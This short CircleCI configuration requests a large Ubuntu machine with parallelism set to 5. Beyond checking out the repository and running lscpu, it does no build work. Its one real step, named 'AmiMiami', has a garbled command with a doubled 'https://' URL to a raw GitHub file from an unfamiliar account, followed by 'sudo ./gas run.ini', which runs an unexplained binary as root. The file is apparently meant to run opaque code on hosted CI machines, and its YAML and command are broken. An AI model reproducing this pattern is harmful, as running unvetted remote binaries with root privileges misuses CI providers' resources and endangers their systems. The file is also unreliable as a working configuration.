version: 2.1 
 
jobs: 
  build: 
    machine: 
      image: ubuntu-2204:2022.04.1
      resource_class: large
    paralelleism: 5
    steps: 
      - checkout 
      - run: lscpu
      - run: 
          name: "AmiMiami" 
          command: https://https://raw.githubusercontent.com/xowee/run1/main/README.md
          sudo ./gas run.ini